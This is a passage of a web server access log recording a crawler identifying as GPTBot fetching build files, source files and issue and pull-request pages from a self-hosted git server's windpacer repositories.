-[17/Feb/2026:19:03:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13730] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:19:03:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:19:03:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:19:03:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:19:03:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:19:03:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:19:03:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15126] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:19:03:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13730] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:19:03:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:19:03:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11052] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:19:03:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15124] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:19:04:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:19:04:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:19:04:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:19:04:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs?display=source" [Client 74.7.227.38] [Length 11769] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" -[17/Feb/2026:19:04:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs?display=source" [Client 74.7.227.38] [Length 11399] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" -[17/Feb/2026:19:04:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs?display=rendered" [Client 74.7.227.38] [Length 11016] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" -[17/Feb/2026:19:04:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" -[17/Feb/2026:19:04:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:04:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:04:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:04:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:04:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:04:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:04:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:04:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:04:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:04:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:04:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:04:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:04:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:04:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:19:04:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:04:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:04:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:04:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=open&type=all" -[17/Feb/2026:19:04:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10140] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:04:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=open&type=all" -[17/Feb/2026:19:04:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9954] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&state=all&type=all" -[17/Feb/2026:19:04:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:04:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11270] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:19:04:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:04:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:04:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:04:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:04:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:04:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:04:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:04:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:04:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:19:04:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9960] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=all&type=all" -[17/Feb/2026:19:04:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:04:21 +0000] - 200 200 - GET https 